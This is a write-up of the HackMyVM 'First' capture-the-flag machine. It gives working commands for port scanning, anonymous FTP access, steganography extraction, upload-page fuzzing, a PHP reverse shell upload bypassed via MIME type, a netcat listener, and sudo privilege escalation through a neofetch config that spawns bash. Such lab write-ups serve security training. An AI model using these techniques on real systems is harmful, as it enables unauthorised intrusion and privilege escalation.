NOTES ABOUT First
[ 2022-10-01 ] [ HackMyVM / First ]Status: Rooted
Skills: Port Scanning, FTP, Fuzzing, PHP Upload Bypass, Reverse Shell, Sudo
Tools: nmap, wfuzz, nc
PORT SCANNING
$ nmap -v -sS -A -p- 10.0.2.13
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 0 0 4096 Aug 09 10:16 fifth
| drwxr-xr-x 2 0 0 4096 Aug 10 12:44 first
| drwxr-xr-x 2 0 0 4096 Aug 09 10:16 fourth
| drwxr-xr-x 2 0 0 4096 Aug 09 10:16 seccond
|_drwxr-xr-x 2 0 0 4096 Aug 09 10:16 third
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.0.2.15
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b8:57:5b:81:5a:78:1f:d6:ff:60:39:bb:32:a8:5d:cd (RSA)
| 256 65:8d:43:ec:63:77:d0:39:c0:1b:3e:40:d9:53:1e:ed (ECDSA)
|_ 256 0f:02:ac:df:e1:31:3c:b2:59:f6:b7:59:09:f1:ff:f8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-title: Site doesnt have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
GETTING IN
$ ftp anonymous@10.0.2.13
Connected to 10.0.2.13.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
ftp> cd first
ftp> get first_Logo.jpg
local: first_Logo.jpg remote: first_Logo.jpg
$ stegseek first_Logo.jpg
$ cat first_Logo.jpg.out | base64 -d
Hi I had to change the name of the todo list becouse directory busting is too easy theese days also I encoded this in besa64 becouse it is cool btw your todo list is : 2f 74 30 64 30 5f 6c 31 73 74 5f 66 30 72 5f 66 31 72 35 74 do it quick we are vulnarable do the first first
$ echo "2f 74 30 64 30 5f 6c 31 73 74 5f 66 30 72 5f 66 31 72 35 74" | xxd -r -p
/t0d0_l1st_f0r_f1r5t
WEB: http://10.0.2.13/t0d0_l1st_f0r_f1r5t/
wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt -r 5 --hc 404 http://10.0.2.13/t0d0_l1st_f0r_f1r5t/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.0.2.13/t0d0_l1st_f0r_f1r5t/FUZZ
Total requests: 5163
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000077: 200 12 L 34 W 348 Ch "upload.php"
SOURCE CODE: https://www.w3schools.com/php/php_file_upload.asp
UPLOADED PHP-REVERSE-SHELL.PHP CHANGING MIME TYPE.
ELEVATING PRIVILEGES
$ nc -lvnp 443
sudo -l
Matching Defaults entries for www-data on first:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on first:
(first : first) NOPASSWD: /bin/neofetch
echo "print_info() { /bin/bash; }" > /tmp/config.txt
sudo -u first /bin/neofetch --config /tmp/config.txt
id
uid=1000(first) gid=1000(first) groups=1000(first),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
sudo -l
Matching Defaults entries for first on first:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User first may run the following commands on first:
(ALL) NOPASSWD: /bin/secret
sudo /bin/secret
pass: asdjlksjdklajsdlk
correct, input command:bash
id
uid=0(root) gid=0(root) groups=0(root)
init 0